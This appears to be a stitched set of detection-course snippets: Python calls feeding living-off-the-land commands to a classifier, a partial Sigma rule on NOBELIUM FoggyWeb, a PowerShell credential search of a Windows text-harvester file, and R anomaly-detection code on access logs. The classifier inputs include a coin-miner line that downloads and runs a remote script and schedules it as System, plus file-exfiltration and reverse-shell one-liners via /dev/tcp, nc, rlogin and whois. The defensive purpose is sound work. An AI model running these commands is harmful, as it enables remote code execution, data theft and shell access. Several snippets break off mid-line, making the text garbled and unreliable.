# LOLBINS coin miner commands from https://lolbas-project.github.io/
# LOLBINS rundll32 execution: https://lolbas-project.github.io/lolbas/Binaries/Rundll32/#execute
# LOLBINS regsvr32 execution: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/#execute
# References:
# WannaMine: https://www.accenture.com/_acnmedia/pdf-46/accenture-threat-analysis-monero-wannamine.pdf
# https://logrhythm.com/blog/how-to-enable-process-creation-events-to-track-malware-and-threat-actor-activity/
from lol.api import LOLC, PlatformType
lolc = LOLC(PlatformType.WINDOWS)  # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands = ['cmd /c echo powershell -nop $a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(SCM Event Filter)))) {IEX(New-Object Net.WebClient).DownloadString(http://stafftest.spdns.eu:8000/mate6.ps1)} >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR %temp%\y1.bat &&SCHTASKS /run /TN yas
# from GTFOBins: file uploads (exfil) examples via bash, rlogin, and whois
# https://gtfobins.github.io/#+file%20upload
from lol.api import LOLC, PlatformType
lolc = LOLC(PlatformType.LINUX)  # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands = ['bash -c echo -e POST / HTTP/0.9\n\n$(<$LFILE) > /dev/tcp/$RHOST/$RPORT',
            'rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST',
            'whois -h $RHOST -p $RPORT base64 $LFILE']
classification, tags = lolc(commands)
for command, status, tag in zip(commands, classification, tags):
# from GTFOBins: reverse shell examples via nc, gimp, and bash
# https://gtfobins.github.io/#+reverse%20shellc
from lol.api import LOLC, PlatformType
lolc = LOLC(PlatformType.LINUX)  # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands = ['nc -e /bin/sh $RHOST $RPORT',
            'gimp -idf --batch-interpreter=python-fu-eval -b import sys,socket,os,pty;s=socket.socket()',
            'bash -c exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1']
classification, tags = lolc(commands)
for command, status, tag in zip(commands, classification, tags):
[
  {
    "title": "NOBELLIUM FoggyWeb File Drop Sysmon",
    "description": "After compromising an AD FS server, NOBELIUM was observed dropping version.dll on the system.",
    "author": "Russ McRee (holisticinfosec), Florian Roth, (@cyb3rops)",
    "tags": [
      "attack.persistence",
      "attack.defense_evasion"
    ],
    "level": "critical",
<?xml version="1.0" encoding="utf-8"?>
<sim>
  <delete>false</delete>
  <errordirectory>C:\Users\Public\Documents\</errordirectory>
  <task>
    <config>
      <name>PowerShell_test</name>
      <loop>3</loop>
      <pause>1000</pause>
    </config>
Stop-Process -name "SearchIndexer" -force;Start-Sleep -m 500;Select-String -Path $env:USERPROFILE\AppData\Local\Microsoft\InputPersonalization\TextHarvester\WaitList.dat -Encoding unicode -Pattern "password" |
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
security_access_logs %>%
  filter(server == "SERVER549521") %>%
  ungroup() %>%
  time_decompose(count) %>%
  anomalize(remainder) %>%
  plot_anomaly_decomposition() +
  labs(title = "Decomposition of Anomalized SERVER-549521 Downloads")
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
SERVER549521 %>%
  # STL + IQR Anomaly Detection
  time_decompose(count, method = "stl", trend = "4 months") %>%
  anomalize(remainder, method = "iqr") %>%
  time_recompose() %>%
  # Anomaly Visualization
  plot_anomalies(time_recomposed = TRUE) +
  labs(title = "SERVER-549521 Anomalies", subtitle = "STL + IQR Methods")
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
# Get only SERVER549521 access
SERVER549521 <- security_access_logs %>%
  filter(server == "SERVER-549521") %>%
  ungroup()
# Anomalize!!
SERVER549521 %>%
  # Twitter + GESD
  time_decompose(count, method = "twitter", trend = "4 months") %>%
# Created from Anomalize project, Matt Dancho
# https://github.com/business-science/anomalize
security_access_logs %>%
  # Data Manipulation / Anomaly Detection
  time_decompose(count, method = "stl") %>%
  anomalize(remainder, method = "iqr") %>%
  time_recompose() %>%
  # Anomaly Visualization
  plot_anomalies(time_recomposed = TRUE, ncol = 3, alpha_dots = 0.25) +
  labs(title = "Security Event Log Anomalies", subtitle = "STL + IQR Methods")